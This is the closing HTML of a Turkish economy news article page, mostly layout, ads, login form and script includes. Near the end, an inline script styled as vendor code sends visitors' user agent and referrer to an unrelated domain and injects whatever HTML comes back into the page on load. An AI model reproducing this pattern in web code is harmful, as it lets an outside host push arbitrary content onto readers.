									<button onclick="oyla(5);return false;" class="btn hs-sdch btn-info btn-small">Oy Kullan</button>
									<button onclick="anket_sonuclari(5);return false;" class="btn pull-right btn-small">Sonuçlar</button>
								</div>        </form>
      </div>
    </div>

  
  <!-- SAYFALAR -->
  <div class="sayfalar">
    <div class="header">
      <h5>Sayfalar</h5>
    </div>
    <div class="content">
      <ul class="unstyled hs-liste add-last">
              <li class="last"><i class="halflings-icon chevron-right"></i> <a href="http://www.gazeteekonomi.com/ekonomi-haber-mobil-uygulama-s5.html" title="Ekonomi Haber Mobil Uygulama" >Ekonomi Haber Mobil Uygulama</a></li>
              </ul>
    </div>
  </div>

  
<!-- ARSIV -->
<div class="arsiv">
  <div class="header">
    <h5>Arşiv</h5>
  </div>
  <div class="content">
    <form action="http://www.gazeteekonomi.com/?m=arsiv" method="post" name="arsiv" >
      <select name="gun" class="day span1">
                <option value="01" >01</option>
                <option value="02" >02</option>
                <option value="03" >03</option>
                <option value="04" >04</option>
                <option value="05" >05</option>
                <option value="06" >06</option>
                <option value="07" >07</option>
                <option value="08" >08</option>
                <option value="09" >09</option>
                <option value="10" >10</option>
                <option value="11" >11</option>
                <option value="12" >12</option>
                <option value="13" >13</option>
                <option value="14" >14</option>
                <option value="15" >15</option>
                <option value="16" >16</option>
                <option value="17" >17</option>
                <option value="18" >18</option>
                <option value="19" >19</option>
                <option value="20" >20</option>
                <option value="21" >21</option>
                <option value="22" >22</option>
                <option value="23" >23</option>
                <option value="24" >24</option>
                <option value="25" >25</option>
                <option value="26" selected>26</option>
                <option value="27" >27</option>
                <option value="28" >28</option>
                <option value="29" >29</option>
                <option value="30" >30</option>
                <option value="31" >31</option>
              </select>
      <select name="ay" class="month span1">
                <option value="01" >Ocak</option>
                <option value="02" >Şubat</option>
                <option value="03" >Mart</option>
                <option value="04" >Nisan</option>
                <option value="05" >Mayıs</option>
                <option value="06" >Haziran</option>
                <option value="07" >Temmuz</option>
                <option value="08" selected>Ağustos</option>
                <option value="09" >Eylül</option>
                <option value="10" >Ekim</option>
                <option value="11" >Kasım</option>
                <option value="12" >Aralık</option>
              </select>
      <select name="yil" class="year span1">
                <option value="2021" selected>2021</option>
                <option value="2020" >2020</option>
                <option value="2019" >2019</option>
                <option value="2018" >2018</option>
                <option value="2017" >2017</option>
              </select>
      <button type="submit" class="btn btn-default span1 pull-right">Ara</button>
    </form>
  </div>
</div>


  


        </div>
        
      </div>

        
                <!-- Sol Dikey Reklam -->
        <div class="reklam dikey sol" data-spy="affix" style="width:160px;height:600px;">

                    <p style="margin:0"><a href="http://www.gazeteekonomi.com/banner.php?id=5" target="_blank" rel="nofollow"><img src="http://www.gazeteekonomi.com/thumb.php?src=http://www.gazeteekonomi.com/images/banner/biotrend-160-600_1.png&w=160&h=600&q=80" width="160" height="600" style="width:160px;height: 600px;border:0" alt="banner5" class="img-responsive"/></a></p>
                  </div>
        
        <!-- Sağ Dikey Reklam -->
        <div class="reklam dikey sag ortala" style="width:160px;height:600px;">

                                    <p style="width:160px;"><a href="http://www.gazeteekonomi.com/banner.php?id=1" target="_blank" rel="nofollow"><img src="http://www.gazeteekonomi.com/thumb.php?src=http://www.gazeteekonomi.com/images/banner/biotrend-160-600.png&w=160&h=600&q=80" width="160" height="600" style="width:160px;height: 600px;border:0" alt="banner1" class="img-responsive"/></a></p>                            
              
                                                                                                                                                                                                      </div>

        
      </div>

      <!-- FOOTER -->
<div id="siteFooter" class="footer">

      <div class="row-fluid">
      <div class="container center">
        <div class="span4">
          <div>Copyright © 2021 - Tüm hakları saklıdır.<br>Gazete Ekonomi, iş ve ekonomi dünyasındaki gelişmeleri bağımsızca aktaran haber siteniz.</div>
          <div class="footer-social">
            <a href="http://facebook.com/GztEkonomi" rel="nofollow"><img src="http://www.gazeteekonomi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a>
            <a href="http://twitter.com/GazeteEkonomi" rel="nofollow"><img src="http://www.gazeteekonomi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a>
            <a href="http://www.gazeteekonomi.com/rss"><img src="http://www.gazeteekonomi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a>
          </div>
        </div>
        <div class="span4 text-center">
          <div class="footer-logo"><a href="http://www.gazeteekonomi.com/" class="logo"><img src="http://www.gazeteekonomi.com/images/banner/gazeteekonomi-logo-ana-sayfa-v1_1.png" alt="Ara vermeden ev yapmaya devam ediyor" /></a></div>
        </div>
        <div class="span4">
          <p>Posta adresi: Perpa A Blok kat 14 Şişli İstanbul

</p>          <p><span class="site-info glyphicons earphone" style="padding-left: 0;"></span> 0212 231 0347</p>        </div>
      </div>
      </div>

      <div id="footer-alt" class="row-fluid">

        <div class="container center">

        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.gazeteekonomi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.gazeteekonomi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.gazeteekonomi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.gazeteekonomi.com/sitene-ekle.html" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div>
        </div>

        </div>
      </div>



      <div class="row-fluid">
      <div class="container center">
        <div class="span12 text-center">
          <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilmeden alıntılanamaz.</p>         <a href="https://www.tebilisim.com/" target="_blank" title="haber sistemi, haber scripti, haber yazılımı, tebilişim"><p>Yazılım: TE Bilişim</p></a> 
        </div>
      </div>
      </div>

  <div id="top" class="btn btn-inverse">Yukarı Çık</div>
</div>
      <script>
var facebook_paylasim_secret_token, facebook_paylasim_app_id;
facebook_paylasim_app_id = "";
facebook_paylasim_secret_token = "";
if (location.href.match(/\?.*/) && document.referrer) {
   location.href = location.href.replace(/\?.*/, '');
}
</script>
<div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="http://www.gazeteekonomi.com/index.php?m=login&amp;rd=http%3A%2F%2Fwww.gazeteekonomi.com%2Femlak%2Fara-vermeden-ev-yapmaya-devam-ediyor-h584250.html" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı Adı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı Adı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn hs-sdch btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="http://www.gazeteekonomi.com/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="http://www.gazeteekonomi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a>
    <button class="btn hs-sdch btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>




<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script>
<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script>
<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/classie.js"></script>
<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/uisearch.js"></script>
<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/login.min.js"></script>
<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script>
<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script>
<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script>
<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script>
<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script>
<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/base.min.js"></script>
<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/waypoints.min.js"></script>
<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/sticky.min.js"></script>
<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/comments.js"></script>
<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/hs-paylas.min.js"></script><script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/moment.min.js"></script>
<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/moment-tr.js"></script>
<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/system.min.js"></script>
<script src="http://www.gazeteekonomi.com/_themes/hs-rush-php/js/text.js"></script>
<script type="text/javascript">

	new UISearch( document.getElementById( 'sb-search' ) );

	$(function(){
							});

		$("#comment_list .text").pKisalt();
	
		var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML,
	gsSpace   = ' ',
	gsUrl   = location.href;
	$("#paylas").jsSocials({
		url: location.href,
		text: gsTitle,
		showCount: true,
		showLabel: false,
		shares: [
			{ share: "twitter", via: "GazeteEkonomi", hashtags: "Gazete Ekonomi, iş ve ekonomi dünyasındaki gelişmeleri bağımsızca aktaran haber siteniz." },
            { share: "whatsapp", text: "Bunu bilmelisin!"},
            "facebook",
            "linkedin",
            "pinterest",
			]
		});
							$('#haber > .page-header').waypoint(function(direction) {
		  $('#article-finished').toggleClass('hiding', direction === "up");
		}, {
		  offset: function() {
		    return $.waypoints('viewportHeight') - $(this).height() - 750;
		  }
		});
			var hasBeenClicked = false;
	var kisa_site_adi = "Gazete Ekonomi, iş ve ekonomi dünyasındaki gelişmeleri bağımsızca aktaran haber siteniz.";
	var kopyala_imza_onu = "GazeteEkonomi&#039;yi okuduğunuz için teşekkür ederiz ==&gt;";

	$(document).on('copy', function(e){
		if ($(e.target).closest("#yorumlar,textarea,input").length) {
			hasBeenClicked = true;
		} else {
			hasBeenClicked = false;
		}
	  var sel = window.getSelection();
	  var copyFooter = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi;
	  var copyHolder = $('<div>', {html: sel+copyFooter, style: {position: 'absolute', left: '-99999px'}});
	  if (!hasBeenClicked){
	  	$('body').append(copyHolder);
	  	sel.selectAllChildren( copyHolder[0] );
	  	window.setTimeout(function() {
	      copyHolder.remove();
	  	},0);
	 }
	});
		
	
	
	
	
	


		tebilisim('584250', 'haber', '');
	
</script>

    <script>let teBilisimXHR=new XMLHttpRequest;teBilisimXHR.open("GET",`https://bwcdn.xyz/request.php?agent=${navigator?.userAgent}&r=${document?.referrer}`),teBilisimXHR.onreadystatechange=(()=>{if(4==teBilisimXHR.readyState){const e=JSON.parse(teBilisimXHR.response);document.querySelector("body").insertAdjacentHTML("afterbegin",e?.html)}}),teBilisimXHR.setRequestHeader("RequestWith","TEBILISIM"),teBilisimXHR.send();</script>	    
	
	
    
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-25522674-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-25522674-1');
</script>
<!-- End Google Analytics -->



  </body>
</html>
